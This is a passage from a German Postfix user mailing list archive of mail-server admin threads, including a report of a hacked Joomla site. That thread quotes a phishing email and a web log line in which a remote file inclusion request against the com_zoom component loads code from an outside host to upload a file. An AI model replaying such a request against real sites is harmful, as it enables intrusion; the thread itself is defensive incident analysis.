2007-11-23 15:37 transport > -rw-r--r-- 1 root postfix 12288 2007-10-19 14:36 transport.db und warum ist die "transport"-Datei neuer als das zugehörige Hash-Table, welches Postfix verwendet..? # postmap transport vergessen..? Christian From mailingliste-postfixbuch at pothe.com Tue Nov 27 17:30:14 2007 From: mailingliste-postfixbuch at pothe.com (Andreas Pothe) Date: Tue, 27 Nov 2007 17:30:14 +0100 Subject: [Postfixbuch-users] Gueltige Adressen auf Backup-MX - wie automatisieren? Message-ID: <000901c83112$ca0ef790$5e2ce6b0$@com> Servus, seit einiger Zeit betreibe ich einen eigenen Backup-MX. Über entsprechend derzeit manuell geflegte Listen kennt dieser auch die gültigen Empfängeradressen über Relay-Maps, sodass dieser MX auch nicht zu einem Backscatter-Versender werden kann. Solange man sowas nur für eigene E-Mail-Adressen macht, wo sich zudem äußerst selten mal eine Änderung ergibt, ist das ja auch praktikabel. Nun soll der Server, der sich die meiste Zeit ja langweilt :-) auch für Freunde als Backup-MX herhalten. Und da ist es eben nicht mehr praktikabel, für jede Adressänderung sich auf eine Konsole zu begeben und manuell die Maps zu pflegen. Irgendwelche Vorschläge, wie man sowas praktikabel löst, d. h. dass der Backup-MX immer (bzw. mit nur geringer Verzögerung) die aktuell gültigen Empfangsadressen kennt? TIA Andreas From driessen at fblan.de Tue Nov 27 17:41:36 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 27 Nov 2007 17:41:36 +0100 Subject: [Postfixbuch-users] Filterzeichen in Mailadressen Message-ID: <001d01c83114$608b2da0$0565a8c0@uwe> RCPT from unknown[200.65.189.174]: 550 5.1.1 <|postnn at xxxxxxxxxxx.de>: ^^ ^^ Ich sehe seit neuestem immer wieder Einlieferungsversuche mit dem | vor den Mailadressen Versuchen die eine Schwachstelle auszunutzen oder ist es nur Schusseligkeit der Versender. Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From mailingliste-postfixbuch at pothe.com Tue Nov 27 17:37:30 2007 From: mailingliste-postfixbuch at pothe.com (Andreas Pothe) Date: Tue, 27 Nov 2007 17:37:30 +0100 Subject: [Postfixbuch-users] FYI: mx1.jpberlin.de: 451 4.3.5 Server configuration problem Message-ID: <000a01c83113$cddc36c0$6994a440$@com> Servus, Peer, ich hatte mich gewundert, wieso die Zustellung meiner Mails heute an die Liste so lange dauerte, deswegen warf ich mal einen Blick ins Log. Gefunden habe ich: Nov 27 17:33:22 pothe postfix/smtp[27558]: 3ADB5194155: host mx1.jpberlin.de[213.203.238.6] said: 451 4.3.5 Server configuration problem (in reply to RCPT TO command) Scheinbar ist da irgendwas ausgefallen oder sonstwas schief gegangen. HTH! Andreas From postfixbuch-users at japantest.homelinux.com Tue Nov 27 17:59:37 2007 From: postfixbuch-users at japantest.homelinux.com (Sandy Drobic) Date: Tue, 27 Nov 2007 17:59:37 +0100 Subject: [Postfixbuch-users] Gueltige Adressen auf Backup-MX - wie automatisieren? In-Reply-To: <000901c83112$ca0ef790$5e2ce6b0$@com> References: <000901c83112$ca0ef790$5e2ce6b0$@com> Message-ID: <474C4CF9.6060206@japantest.homelinux.com> Andreas Pothe wrote: > Servus, > > seit einiger Zeit betreibe ich einen eigenen Backup-MX. Über entsprechend > derzeit manuell geflegte Listen kennt dieser auch die gültigen > Empfängeradressen über Relay-Maps, sodass dieser MX auch nicht zu einem > Backscatter-Versender werden kann. > > Solange man sowas nur für eigene E-Mail-Adressen macht, wo sich zudem > äußerst selten mal eine Änderung ergibt, ist das ja auch praktikabel. Nun > soll der Server, der sich die meiste Zeit ja langweilt :-) auch für Freunde > als Backup-MX herhalten. Und da ist es eben nicht mehr praktikabel, für jede > Adressänderung sich auf eine Konsole zu begeben und manuell die Maps zu > pflegen. > > Irgendwelche Vorschläge, wie man sowas praktikabel löst, d. h. dass der > Backup-MX immer (bzw. mit nur geringer Verzögerung) die aktuell gültigen > Empfangsadressen kennt? Wenn die Rolle immer Backup-MX ist, dann sollte er die Erlaubnis haben, beim Primary per reject_unverified_recipient nachzuhaken, ob die Mail angenommen wird. Dies gilt auch dafür, wenn der Primary ein Kundenserver etc. ist. Sollte das nicht möglich sein, gibt es nur noch die Pflege einer relay_recipient_maps oder eine Umschreibung auf einen Catchall oder ähnliches. Letzteres allerdings solle man als wirklich letzte Lösung betrachten. Wie genau sieht denn deine Situation aus? -- Sandy Antworten bitte nur in die Mailingliste! PMs bitte an: news-reply2 (@) japantest (.) homelinux (.) com From driessen at fblan.de Tue Nov 27 17:59:53 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 27 Nov 2007 17:59:53 +0100 Subject: [Postfixbuch-users] Gueltige Adressen auf Backup-MX - wieautomatisieren? In-Reply-To: <000901c83112$ca0ef790$5e2ce6b0$@com> References: <000901c83112$ca0ef790$5e2ce6b0$@com> Message-ID: <001f01c83116$ee1982f0$0565a8c0@uwe> Andreas Pothe schrieb: > Servus, > > seit einiger Zeit betreibe ich einen eigenen Backup-MX. Über entsprechend > derzeit manuell geflegte Listen kennt dieser auch die gültigen > Empfängeradressen über Relay-Maps, sodass dieser MX auch nicht zu einem > Backscatter-Versender werden kann. > > Solange man sowas nur für eigene E-Mail-Adressen macht, wo sich zudem > äußerst selten mal eine Änderung ergibt, ist das ja auch praktikabel. Nun > soll der Server, der sich die meiste Zeit ja langweilt :-) auch für Freunde > als Backup-MX herhalten. Und da ist es eben nicht mehr praktikabel, für jede > Adressänderung sich auf eine Konsole zu begeben und manuell die Maps zu > pflegen. > > Irgendwelche Vorschläge, wie man sowas praktikabel löst, d. h. dass der > Backup-MX immer (bzw. mit nur geringer Verzögerung) die aktuell gültigen > Empfangsadressen kennt? Script das bei Änderung die Daten auf den MX spielt? Senderverify auf dem MX der, bei noch nicht bekannten Adressen, den zuständigen Hauptserver anfragt. SQL- Replikation ? hauptserver1 -> MX, Hauptserver2 -> MX > > TIA > Andreas Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From ml at awinkelmann.de Tue Nov 27 10:41:23 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Tue, 27 Nov 2007 10:41:23 +0100 (CET) Subject: [Postfixbuch-users] no_header_body_checks-Direktive will nicht In-Reply-To: <474BE39B.8000100@net-com.de> References: <474BE39B.8000100@net-com.de> Message-ID: <64014.169.128.231.104.1196156483.squirrel@a-angels.ath.cx> > auf einem frisch aufgesetzten FreeBSD System mit Postfix v2.4.6 habe ich > Probleme mit der Direktive receive_override_option=no_header_body_checks. Vermutlich weil es "..._optionS" heisst. -- Andreas From cscholz at 2nibbles4u.de Tue Nov 27 21:50:53 2007 From: cscholz at 2nibbles4u.de (Christian Scholz) Date: Tue, 27 Nov 2007 21:50:53 +0100 Subject: [Postfixbuch-users] Filterzeichen in Mailadressen In-Reply-To: <001d01c83114$608b2da0$0565a8c0@uwe> References: <001d01c83114$608b2da0$0565a8c0@uwe> Message-ID: <63908DA348933441A6FB2AB998ED894F065E03@dcex01.2nibbles4u.local> > RCPT from unknown[200.65.189.174]: 550 5.1.1 <|postnn at xxxxxxxxxxx.de>: > ^^ ^^ > > Ich sehe seit neuestem immer wieder Einlieferungsversuche mit dem | vor > den Mailadressen > Versuchen die eine Schwachstelle auszunutzen oder ist es nur > Schusseligkeit der Versender. Hatte das gleiche Problem bei einem Kunden. (http://listi.jpberlin.de/pipermail/postfixbuch-users/2007-September/037704.html) Da es durchweg nur Spam-eMails waren bei denen wir das Problem hatten und der Kunde einen vorgelarten eMail Servers eines anderen Anbieter nutzt hab ich mich nach längerer Analyse der eMails dazu durchgerungen diese eMails einfach nicht anzunehmen... da damals keiner etwas ähnliches geschildert hatte, bin ich davon ausgegangen, dass es kein weitreichenderes Problem sein könnte. Dazu kommt, dass bis zur Aktualisierung des Kundenservers solche eMails nicht aufgelaufen sind. Woher es aber kommt würde mich dennoch interessieren! Christian Scholz From driessen at fblan.de Tue Nov 27 22:41:41 2007 From: driessen at fblan.de (Uwe Driessen) Date: Tue, 27 Nov 2007 22:41:41 +0100 Subject: [Postfixbuch-users] Filterzeichen in Mailadressen In-Reply-To: <63908DA348933441A6FB2AB998ED894F065E03@dcex01.2nibbles4u.local> References: <001d01c83114$608b2da0$0565a8c0@uwe> <63908DA348933441A6FB2AB998ED894F065E03@dcex01.2nibbles4u.local> Message-ID: <002401c8313e$4cc2b020$0565a8c0@uwe> Christian Scholz schrieb: > Hatte das gleiche Problem bei einem Kunden. > (http://listi.jpberlin.de/pipermail/postfixbuch-users/2007-September/037704.html) > Da es durchweg nur Spam-eMails waren bei denen wir das Problem hatten und der Kunde > einen vorgelarten eMail Servers eines anderen Anbieter nutzt hab ich mich nach längerer > Analyse der eMails dazu durchgerungen diese eMails einfach nicht anzunehmen... da damals > keiner etwas ähnliches geschildert hatte, bin ich davon ausgegangen, dass es kein > weitreichenderes Problem sein könnte. Angenommen werden die auch nicht kommen entweder von Servern ohne PTR/rDNS oder aus Dialinnetzen von den "offiziellen Mailservern" habe ich so was noch nicht gesehen. Ist persönliche Neugierde ob das evtl. ein Problem werden könnte und ob das einen Hintergrund den ich noch nicht kenne hat. Aber scheinbar sind wir die einzigen bis dato die das bemerkt haben. Evtl. auch nur ein schlecht programmierter Wurm oder sonst was. > Christian Scholz > -- Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From mkellermann at net-com.de Wed Nov 28 08:24:22 2007 From: mkellermann at net-com.de (Matthias Kellermann) Date: Wed, 28 Nov 2007 08:24:22 +0100 Subject: [Postfixbuch-users] no_header_body_checks-Direktive will nicht In-Reply-To: <64014.169.128.231.104.1196156483.squirrel@a-angels.ath.cx> References: <474BE39B.8000100@net-com.de> <64014.169.128.231.104.1196156483.squirrel@a-angels.ath.cx> Message-ID: <474D17A6.3050801@net-com.de> Andreas Winkelmann schrieb: >> auf einem frisch aufgesetzten FreeBSD System mit Postfix v2.4.6 habe ich >> Probleme mit der Direktive receive_override_option=no_header_body_checks. > > Vermutlich weil es "..._optionS" heisst. Oh... - Tatsache. Da hab ich wohl den Wald vor lauter Bäumen nicht mehr gesehen. Danke Andreas :) Matthias From postfixbuch at thomas-schwenski.de Wed Nov 28 08:23:40 2007 From: postfixbuch at thomas-schwenski.de (Thomas Schwenski) Date: Wed, 28 Nov 2007 08:23:40 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix Message-ID: <474D177C.7070305@thomas-schwenski.de> Hallo, da Peer vor kurzem hier mit der Aussage zitiert wurde eine Courier IMAP-Sitzung würde permanent (solange offen) 1MB Arbeitsspeicher verbraten, wollte ich mal nachfragen, wie man dies ermitteln/belegen kann. Ich brauche für eine Dokumentation leider einen für einen außenstehenden glaubhaften Messwert/Nachweis. Also wie kann ich das messen? (Oder ist der Verbrauch irgendwo dokumentiert.) Dasselbe gilt für den Amavisd-New- (mit SpamAssassin & ClamAV) und Postfix-Verbrauch pro Mail Wie lässt der sich ermitteln/berechnen? Gruß Thomas From Ralf.Hildebrandt at charite.de Wed Nov 28 09:18:57 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Wed, 28 Nov 2007 09:18:57 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <474D177C.7070305@thomas-schwenski.de> References: <474D177C.7070305@thomas-schwenski.de> Message-ID: <20071128081857.GB8464@charite.de> * Thomas Schwenski : > > Hallo, > > da Peer vor kurzem hier mit der Aussage zitiert wurde eine Courier > IMAP-Sitzung würde permanent (solange offen) 1MB Arbeitsspeicher > verbraten, wollte ich mal nachfragen, wie man dies ermitteln/belegen kann. > > Ich brauche für eine Dokumentation leider einen für einen außenstehenden > glaubhaften Messwert/Nachweis. > Also wie kann ich das messen? ps? top? -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de And when all the snow were burnt, yet ashes would remain From sven at root2.schroederhost.de Wed Nov 28 10:32:58 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Wed, 28 Nov 2007 10:32:58 +0100 Subject: [Postfixbuch-users] Mailman / loops back to myself In-Reply-To: <56111.80.87.162.65.1196180057.squirrel@aachalon.de> References: <474AA2C3.7090105@root2.schroederhost.de><200711261739.35515.ml@awinkelmann.de> <474C241B.8080907@root2.schroederhost.de> <001501c83103$ecb64410$0565a8c0@uwe> <474C331E.3020304@root2.schroederhost.de> <56111.80.87.162.65.1196180057.squirrel@aachalon.de> Message-ID: <474D35CA.2050807@root2.schroederhost.de> Christian Bricart schrieb: > und warum ist die "transport"-Datei neuer als das zugehörige Hash-Table, > welches Postfix verwendet..? > > # postmap transport > > vergessen..? > > Christian > > ja stimmt, die alte Transport muss leer gewesen sein: "Binärdateien transport.db and transport.db.old sind verschieden." From cite at incertum.net Wed Nov 28 11:44:41 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Wed, 28 Nov 2007 11:44:41 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <474D177C.7070305@thomas-schwenski.de> References: <474D177C.7070305@thomas-schwenski.de> Message-ID: <20071128104441.GA12941@mail.incertum.net> * Thomas Schwenski wrote: > da Peer vor kurzem hier mit der Aussage zitiert wurde eine Courier > IMAP-Sitzung würde permanent (solange offen) 1MB Arbeitsspeicher > verbraten, wollte ich mal nachfragen, wie man dies ermitteln/belegen kann. "pmap" auf die PID der Sitzung. Mehr muß man nicht wissen und genauer (shared memory, anonyme Mappings etc.) geht es AFAIK auch nicht. Ob's das auch auf anderen Plattformen als Linus gibt, weiß ich aber nicht. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #68: WWW - World Wide Waiting From cite at incertum.net Wed Nov 28 11:51:44 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Wed, 28 Nov 2007 11:51:44 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <20071128104441.GA12941@mail.incertum.net> References: <474D177C.7070305@thomas-schwenski.de> <20071128104441.GA12941@mail.incertum.net> Message-ID: <20071128105144.GB12941@mail.incertum.net> * Stefan Förster wrote: > Ob's das auch auf anderen Plattformen als Linus gibt, weiß ich aber ^ > nicht. Mehr Kaffee, bitte. Danke. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #226: Allgemeine Schutzverletzung - Paragraph in Lizenzverträgen von Microsoft, Nutzer zu beliebiger Zeit und ohne Vorwarnung bestrafen zu dürfen. (Manfred Worm Schäfer) From anmeyer at anup.de Wed Nov 28 12:12:08 2007 From: anmeyer at anup.de (Andreas Meyer) Date: Wed, 28 Nov 2007 12:12:08 +0100 Subject: [Postfixbuch-users] Speicherverbrauch POP/IMAP-Sitzung bei Courier/ Mails in Amavis/Postfix In-Reply-To: <474D177C.7070305@thomas-schwenski.de> References: <474D177C.7070305@thomas-schwenski.de> Message-ID: <20071128121208.62c229ca@gamma.meyer.home> Thomas Schwenski schrieb: > > Hallo, > > da Peer vor kurzem hier mit der Aussage zitiert wurde eine Courier > IMAP-Sitzung würde permanent (solange offen) 1MB Arbeitsspeicher > verbraten, wollte ich mal nachfragen, wie man dies ermitteln/belegen kann. > > Ich brauche für eine Dokumentation leider einen für einen außenstehenden > glaubhaften Messwert/Nachweis. > Also wie kann ich das messen? > (Oder ist der Verbrauch irgendwo dokumentiert.) > > Dasselbe gilt für den Amavisd-New- (mit SpamAssassin & ClamAV) und > Postfix-Verbrauch pro Mail > Wie lässt der sich ermitteln/berechnen? Vielleicht ist das nachfolgende perl-script was für Dich: #!/usr/bin/perl -w # by Kristian K.hntopp # made more robust by David Haller # # USAGE: memuse.pl PID # # e.g.: # $ ps axuwww| awk '/[k]deinit/{print $2;}' | xargs -i memuse.pl {} # or: # $ ls -d /proc/[0-9]* | sed 's at .*/$[0-9]*$@\1@' | sort -n \ # | xargs -i memuse.pl {} 2>&1 | less #no warnings qw(once); use strict; die "Usage: $0 PID\n" unless $ARGV[0] > 0; my ($share, $total); my $file = sprintf "/proc/%s/cmdline", $ARGV[0]; if(!-e $file) { print STDERR "No such file: $file\n"; exit(1); } else { open IN, "<$file" or print STDERR "Cannot open $file: $!"; } (my $line = ) =~ s/\0/ /g; close IN; printf "[$ARGV[0]] %s\n", $line ? $line : "kernel pseudo-process"; $file = sprintf "/proc/%s/maps", $ARGV[0]; if(!-e $file) { print STDERR "No such file: $file\n"; exit(1); } open IN, "<$file" or die "$!"; while() { my ( $mem, $prot, $offset, $dev, $inode) = split; my ( $start, $stop ) = split "-", $mem; my $size = hex($stop) - hex($start); $total += $size; my $able = " "; if ($prot =~ /^r-/ and $inode != 0) { $share += $size; $able = "s"; } } close IN; printf "share = %12d (%8.2f MB)\n", $share, $share/1048576; printf "private = %12d (%8.2f MB)\n", $total-$share, ($total-$share)/1048576; printf "total = %12d (%8.2f MB) (%6.2f %% shareable)\n", $total, $total/1048576, ( $total != 0 ? $share/$total*100 : 0); Da kommt dann sowas dabei raus: [1420] kernel pseudo-process share = 4030464 ( 3.84 MB) private = 532480 ( 0.51 MB) total = 4562944 ( 4.35 MB) ( 88.33 % shareable) -- Andreas Meyer Mein öffentlicher GPG-Schlüssel unter: http://gpg-keyserver.de/pks/lookup?search=anmeyer&fingerprint=on&op=index From nospam at thoma.cc Wed Nov 28 13:04:48 2007 From: nospam at thoma.cc (Maximilian Thoma) Date: Wed, 28 Nov 2007 13:04:48 +0100 Subject: [Postfixbuch-users] Postfix Loadbalancing und Backup Message-ID: <474D5960.7000007@thoma.cc> Hallo Liste, ich habe vor mit 4 Servern ein "Loadbalancing/Backup" einzurichten. Ziel dabei soll sein die Last und die User auf diese 4 Server zu verteilen. Dabei soll jeweils die anderen 3 den Backup für einen machen. Das verteilen der Last möchte ich per DNS realisieren das funktioniert auch im LAB sehr gut. mxlb.example.de -> A 10.4.4.1, A 10.4.4.2, A 10.4.4.3, A 10.4.4.4 mx01.example.de -> A 10.4.4.1 und jeweils dazu den PTR mx02.example.de -> A 10.4.4.2 und jeweils dazu den PTR mx03.example.de -> A 10.4.4.3 und jeweils dazu den PTR mx04.example.de -> A 10.4.4.4 und jeweils dazu den PTR Bei einer Kundendomain wird dann mxlb.example.de als MX eingetragen. via Round Robin werden dann die Mails auf die Server verteilt. Alle Userdaten sind in MySQL gespeichert. Jeder Host betreibt seinen eigenen POP und IMAP server. per Perdition werden dann unter einer Adresse (imap.example.de und pop3.example.de) zur Verfügung gestellt. Es wird anhand einer mysql Tabelle entschieden wohin der Login (imap und pop) "geroutet" wird. Das funktioniert ebenfalls super. Die MySQL Tabellen werden via MySQL Replication auf allen Servern verteilt. Die Domains für die der Server nicht zuständig ist sind in der relay_domains drin und sollen dann an den entsprechenden Server zugestellt werden. Mein Problem ist folgendes: Beispiel: from:x at y.de to:user at example.org domain example.org liegt auf mx02.example.de und wird von mx01.example.de angenommen. mx01.example.de kennt die domain example.org nicht ist aber in relay_domains drin und der mx eintrag von der domain wird aufgelöst um den relay host rauszufinden. wenn jetzt bei der auflösung durch das round robin gerade mx01.example.de als zieladresse aufgelöst wird dann bounced er die nachricht mit loop back to myself und stellt sie nicht dem host mx02.example.de zu. meine idee war dann eine transport map zu schreiben allerdings blieb das leider ohne erfolg. mysql> select * from transport; +----+------------------+------------------------+ | id | domain | destination | +----+------------------+------------------------+ | 1 | example.org | smtp:mx02.example.de | +----+------------------+------------------------+ 1 rows in set (0.00 sec) das ganze hängt dann per transport_maps = mysql:/etc/postfix/mysql-v_transport.cf drin. Der Test ob die Transport Map funktioniert war ebenfalls erfolgreich. root at mx02:/# postmap -q example.org mysql:/etc/postfix/mysql-v_transport.cf smtp:mx02.example.de Leider ignoriert er diese Map vollständig. Was kann ich tun damit es funktioniert bzw. habt ihr eine bessere Idee ? Danke im voraus. Gruß Maximilian -- \\|// (o o) --------------------------------------------------ooO-(_)-Ooo--- Maximilian Thoma PGP: http://mirror.thoma.cc/pgp/0x6AC4976A.asc Resistance is futile ... Do not use my spamtrap: spamtrap at thoma.cc - Thanks! Ooo. -------------------------------------------------.ooO----( )--- ( ) (_/ \_) From sven at root2.schroederhost.de Wed Nov 28 14:31:43 2007 From: sven at root2.schroederhost.de (Sven Schmidt) Date: Wed, 28 Nov 2007 14:31:43 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?Procmail_und_virtuelle_Postf?= =?iso-8859-15?q?=E4cher?= Message-ID: <474D6DBF.2030201@root2.schroederhost.de> Hallo! Ich versuche mit Procmail Spammails in einen Lernbox zu kopieren. PATH=/bin:/usr/bin LOGFILE=/var/log/procmail-v.log VERBOSE=off :0 c * ^X-Spam-Level: \*\* /var/mail/spamfach Leider sieht procmail nur Mails für locale User. Main.cf mailbox_command = /usr/bin/procmail -a "$EXTENSION" Geht das vielleicht gar nicht mit Procmail? From driessen at fblan.de Wed Nov 28 14:39:07 2007 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 28 Nov 2007 14:39:07 +0100 Subject: [Postfixbuch-users] OT Site gehackt Message-ID: <000f01c831c4$0cc50a50$0565a8c0@uwe> Hallo Leute Bin zur Zeit auf der Spur eines Hacks der eine von mir betreute Seite befallen hat. Es wurde wie auch immer eine link.php in ein Unterverzeichnis eingeschleust. Ich habe die Seite kurzerhand auf meinen Server umgeleitet und habe seit heute morgen ca. 3600 Zugriffsversuche auf eine Datei dieses Namens Damit die nicht wie auch immer ersetzt werden kann habe ich eine eigene mit dem Namen angelegt die nur noch einen Warnhinweis bringt. Die Datei wurde leider im der ersten Aufregung einfach nur gelöscht zur Zeit warte ich darauf das der Admin des Servers diese evtl. noch mal aus einem Backup rekonstruiert und zu ergründen was da gemacht wurde. Habt Ihr schon mal etwas ähnliches erlebt? Aufgefallen ist das ganze weil eine Mail von Spamcop beim Admin des anderen Servers eingetrudelt war mit folgendem Inhalt Evtl könnt Ihr damit etwas anfangen bitte versucht NICHT die Datei auf der Seite aufzurufen dann wird eine Sperre von 10 Stunden verhängt [ Offending message ] Return-Path: Delivered-To: x Received: (qmail 83436 invoked by uid 89); 27 Nov 2007 03:08:58 -0200 Received: from x24.alfaservers.com (85.17.169.5) by mx.internetbrasil.net with ESMTP; 27 Nov 2007 03:08:57 -0200 Received-SPF: pass (mx.internetbrasil.net: local policy designates 85.17.169.5 as permitted sender) Received: from nobody by x24.alfaservers.com with local (Exim 4.68) (envelope-from ) id 1IwsgX-0006k2-CP for x; Tue, 27 Nov 2007 06:08:37 +0100 To: x Subject: Atendimento, Chegou 1 vivo foto torpedo. From: Vivo Torpedo X-Sender: vivotorpedo at vivo.com.br From: Vivo Torpedo X-Mailer:PHP 5.05 MIME-Version: 1.0 Content-type: text/html; charset=iso-8859-1 Message-Id: Date: Tue, 27 Nov 2007 06:08:37 +0100 X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - x24.alfaservers.com X-AntiAbuse: Original Domain - mco2.com.br X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12] X-AntiAbuse: Sender Address Domain - x24.alfaservers.com Vivo Foto Torpedo

Você recebeu um Vivo Foto Torpedo!
Foto Torpedo enviado do número 011 81136736.

Visualizar Foto
(90kb / tempo estimado: 0:50seg)

Vivo agora do seu celular para seu e-mail.
Importante: Foto Torpedo ficará disponível na Web durante 7 dias.
Vivo - Sinal de qualidade.

--- End of Mail Submission --- Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From crandler at crandland.de Wed Nov 28 14:54:10 2007 From: crandler at crandland.de (crandler) Date: Wed, 28 Nov 2007 14:54:10 +0100 Subject: [Postfixbuch-users] OT Site gehackt In-Reply-To: <000f01c831c4$0cc50a50$0565a8c0@uwe> Message-ID: <013d01c831c6$26b8f3c0$2200a8c0@netclusive.local> Uwe Driessen schrieb: > Bin zur Zeit auf der Spur eines Hacks der eine von mir betreute Seite > befallen hat. > Es wurde wie auch immer eine link.php in ein Unterverzeichnis > eingeschleust. > > Ich habe die Seite kurzerhand auf meinen Server umgeleitet und habe seit > heute morgen ca. > 3600 Zugriffsversuche auf eine Datei dieses Namens > Damit die nicht wie auch immer ersetzt werden kann habe ich eine eigene > mit dem Namen > angelegt die nur noch einen Warnhinweis bringt. > > Die Datei wurde leider im der ersten Aufregung einfach nur gelöscht zur > Zeit warte ich > darauf das der Admin des Servers diese evtl. noch mal aus einem Backup > rekonstruiert und > zu ergründen was da gemacht wurde. > > Habt Ihr schon mal etwas ähnliches erlebt? Hallo Uwe! Das riecht nach langweiliger Code Injection per php. "com_zoom" dürfte Teil von Mambo/Joomla sein. Such doch mal die Logs ab - evtl. wirst du fündig. Code Injection ist dir ein Begriff? Gruß Sven From mhaegele at linuxrocks.dyndns.org Wed Nov 28 15:02:52 2007 From: mhaegele at linuxrocks.dyndns.org (Matthias Haegele) Date: Wed, 28 Nov 2007 15:02:52 +0100 Subject: [Postfixbuch-users] OT Site gehackt In-Reply-To: <000f01c831c4$0cc50a50$0565a8c0@uwe> References: <000f01c831c4$0cc50a50$0565a8c0@uwe> Message-ID: <474D750C.2060007@linuxrocks.dyndns.org> Uwe Driessen schrieb: > Hallo Leute > > Bin zur Zeit auf der Spur eines Hacks der eine von mir betreute Seite befallen hat. > Es wurde wie auch immer eine link.php in ein Unterverzeichnis eingeschleust. Steht der (gecrackte) Server unter deiner Kontrolle? Nach einem Befall ist es das wichtigste "Beweissicherung" anzugehen, je schneller desto besser, je weniger Zeit hat der Angreifer seine Spuren zu beseitigen. Wichtig wäre es natürlich festzustellen wie der Angreifer Zugriff auf das System bekam (PHP-Lücke, Kernel, etc ...). Damit nicht hernach wieder über selbige (ungepatchte) das System nochmals gekapert werden kann. Ob er Root-Zugriff bekam oder "nur" die "Webseite verunglimpfen" konnte. (In diesem Zusammenhang kann man auch auf offene Ports zu IRC-Bots etc. ein Auge werfen). "Online-Analyse" bzw. "Offline-Analyse", bei ersterem wird versucht im Laufenden System Hinweise zu finden, bei letzterem wird versucht das System, kommt natürlich auch darauf an wie verfügbar der Server ist, ob man sich "downtime" leisten kann ... btw: Es ist besser den Server "hart" über den "Poweroff-Knopf, nicht das Kommando" auszuschalten, als etwa zu riskieren dass beim Herunterfahren irgendwelche Skripte, etc. Spuren beseitigen. > Ich habe die Seite kurzerhand auf meinen Server umgeleitet und habe seit heute morgen ca. > 3600 Zugriffsversuche auf eine Datei dieses Namens > Damit die nicht wie auch immer ersetzt werden kann habe ich eine eigene mit dem Namen > angelegt die nur noch einen Warnhinweis bringt. > > Die Datei wurde leider im der ersten Aufregung einfach nur gelöscht zur Zeit warte ich > darauf das der Admin des Servers diese evtl. noch mal aus einem Backup rekonstruiert und > zu ergründen was da gemacht wurde. > > Habt Ihr schon mal etwas ähnliches erlebt? > > Aufgefallen ist das ganze weil eine Mail von Spamcop beim Admin des anderen Servers > eingetrudelt war mit folgendem Inhalt > Evtl könnt Ihr damit etwas anfangen bitte versucht NICHT die Datei auf der Seite > aufzurufen dann wird eine Sperre von 10 Stunden verhängt > [...] Evtl. hilft die Helix Live CD (statisch gelinkte Programme usw.) zur Beweissicherung http://www.e-fense.com/helix/contents.php Unter Umständen sollte man in so einem Fall einen Experten hinzuziehen, man vernichtet leicht Beweise ... (Persönlich würde ich mir es nicht zutrauen das richtig durchzuführen (Vor Gericht verwertbar mit md5sums usw. ...)). Hoffe mein Halbwissen hilft etwas ;-). > Mit freundlichen Grüßen > > Drießen -- Grüsse/Greetings MH Dont send mail to: ubecatcher at linuxrocks.dyndns.org -- From driessen at fblan.de Wed Nov 28 15:11:51 2007 From: driessen at fblan.de (Uwe Driessen) Date: Wed, 28 Nov 2007 15:11:51 +0100 Subject: [Postfixbuch-users] OT Site gehackt In-Reply-To: <013d01c831c6$26b8f3c0$2200a8c0@netclusive.local> References: <000f01c831c4$0cc50a50$0565a8c0@uwe> <013d01c831c6$26b8f3c0$2200a8c0@netclusive.local> Message-ID: <001201c831c8$9fb1a9a0$0565a8c0@uwe> Crandler schrieb: > Hallo Uwe! > > Das riecht nach langweiliger Code Injection per php. "com_zoom" dürfte Teil > von Mambo/Joomla sein. Such doch mal die Logs ab - evtl. wirst du fündig. > > Code Injection ist dir ein Begriff? Jap ich habe auch gerade mal 10 MB Logfiles durchgeschaut von dem Fremden Server bzw. dieser Site. Ist richtig gehört zur Zoomgalery von Joomla In den Logs habe ich folgendes gefunden Hier war diese Datei gelöscht 201.86.233.130 - - [27/Nov/2007:19:39:19 +0100] "GET /components/com_zoom/link.php HTTP/1.1" 404 315 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" Hier wird sie wieder eingeschleust 201.19.118.75 - - [27/Nov/2007:19:39:26 +0100] "POST /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://snob.n o-ip.info/cmd?&action=upload&chdir=/var/www/web396/html/bavaria/bavaria/components/com_zoo m/ HTTP/1.1" 200 32656 "http://www.bavaria-ebernburg.de/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosCo 